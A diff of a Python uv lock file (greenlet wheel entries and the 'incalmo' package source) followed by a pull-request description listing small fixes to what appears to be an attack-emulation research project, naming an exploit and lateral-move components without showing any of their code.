     { url = "https://files.pythonhosted.org/packages/8e/6a/1e1b5aa10dced4ae876a322155705257748108b7fd2e4fae3f2a091fe81a/greenlet-3.2.3-cp313-cp313-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:2d8aa5423cd4a396792f6d4580f88bdc6efcb9205891c9d40d20f6e670992efb", size = 650037, upload-time = "2025-06-05T16:13:06.402Z" },
     { url = "https://files.pythonhosted.org/packages/26/f2/ad51331a157c7015c675702e2d5230c243695c788f8f75feba1af32b3617/greenlet-3.2.3-cp313-cp313-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:2c724620a101f8170065d7dded3f962a2aea7a7dae133a009cada42847e04a7b", size = 608402, upload-time = "2025-06-05T16:12:51.91Z" },
     { url = "https://files.pythonhosted.org/packages/26/bc/862bd2083e6b3aff23300900a956f4ea9a4059de337f5c8734346b9b34fc/greenlet-3.2.3-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:873abe55f134c48e1f2a6f53f7d1419192a3d1a4e873bace00499a4e45ea6af0", size = 1119577, upload-time = "2025-06-05T16:36:49.787Z" },
@@ -422,7 +421,6 @@ wheels = [
     { url = "https://files.pythonhosted.org/packages/d8/ca/accd7aa5280eb92b70ed9e8f7fd79dc50a2c21d8c73b9a0856f5b564e222/greenlet-3.2.3-cp314-cp314-macosx_11_0_universal2.whl", hash = "sha256:3d04332dddb10b4a211b68111dabaee2e1a073663d117dc10247b5b1642bac86", size = 271479, upload-time = "2025-06-05T16:10:47.525Z" },
     { url = "https://files.pythonhosted.org/packages/55/71/01ed9895d9eb49223280ecc98a557585edfa56b3d0e965b9fa9f7f06b6d9/greenlet-3.2.3-cp314-cp314-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:8186162dffde068a465deab08fc72c767196895c39db26ab1c17c0b77a6d8b97", size = 683952, upload-time = "2025-06-05T16:38:55.125Z" },
     { url = "https://files.pythonhosted.org/packages/ea/61/638c4bdf460c3c678a0a1ef4c200f347dff80719597e53b5edb2fb27ab54/greenlet-3.2.3-cp314-cp314-manylinux2014_ppc64le.manylinux_2_17_ppc64le.whl", hash = "sha256:f4bfbaa6096b1b7a200024784217defedf46a07c2eee1a498e94a1b5f8ec5728", size = 696917, upload-time = "2025-06-05T16:41:38.959Z" },
-    { url = "https://files.pythonhosted.org/packages/22/cc/0bd1a7eb759d1f3e3cc2d1bc0f0b487ad3cc9f34d74da4b80f226fde4ec3/greenlet-3.2.3-cp314-cp314-manylinux2014_s390x.manylinux_2_17_s390x.whl", hash = "sha256:ed6cfa9200484d234d8394c70f5492f144b20d4533f69262d530a1a082f6ee9a", size = 692443, upload-time = "2025-06-05T16:48:23.113Z" },
     { url = "https://files.pythonhosted.org/packages/67/10/b2a4b63d3f08362662e89c103f7fe28894a51ae0bc890fabf37d1d780e52/greenlet-3.2.3-cp314-cp314-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:02b0df6f63cd15012bed5401b47829cfd2e97052dc89da3cfaf2c779124eb892", size = 692995, upload-time = "2025-06-05T16:13:07.972Z" },
     { url = "https://files.pythonhosted.org/packages/5a/c6/ad82f148a4e3ce9564056453a71529732baf5448ad53fc323e37efe34f66/greenlet-3.2.3-cp314-cp314-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:86c2d68e87107c1792e2e8d5399acec2487a4e993ab76c792408e59394d52141", size = 655320, upload-time = "2025-06-05T16:12:53.453Z" },
     { url = "https://files.pythonhosted.org/packages/5c/4f/aab73ecaa6b3086a4c89863d94cf26fa84cbff63f52ce9bc4342b3087a06/greenlet-3.2.3-cp314-cp314-win_amd64.whl", hash = "sha256:8c47aae8fbbfcf82cc13327ae802ba13c9c36753b67e760023fd116bc124a62a", size = 301236, upload-time = "2025-06-05T16:15:20.111Z" },
@@ -521,7 +519,7 @@ wheels = [
 [[package]]
 name = "incalmo"
 version = "0.1.0"
-source = { virtual = "." }
+source = { editable = "." }
 dependencies = [
     { name = "celery" },
     { name = "click" },


### PR DESCRIPTION
A few small, independent fixes grouped together.

## Changes
- Fix the Struts exploit (and Nikto scan reference)
- Move the Incalmo output dir when used with the experiment harness
- Change environment names to `snake_case` instead of camelCase (config files + frontend API hook)

## Notes
- Two commits originally on the `RSA` branch were **already merged to `main`** and so are excluded here: "Added MHBench Integration to README" and "fix subnet not found (#137)".
- The lateral-move `nc_lateral_move` fix is also already on `main` (`687a911`), so no separate PR was needed for it.

_Stacked on #140 (ssh-exfil-fixes)._